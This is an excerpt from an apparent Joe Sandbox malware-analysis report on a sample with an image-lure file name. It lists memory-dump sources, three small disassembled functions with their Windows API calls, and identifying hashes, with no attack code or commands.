                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                        • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                        Function 00405E4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E63
                                        • GetTempFileNameA.KERNEL32(0000000C,?,00000000,?,?,004033D6,00436000,00436400,00436400,00436400,00436400,00436400,00436400,004036B5,?,00000008), ref: 00405E7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                        • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                        Function 00405D85 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                        • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                        • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C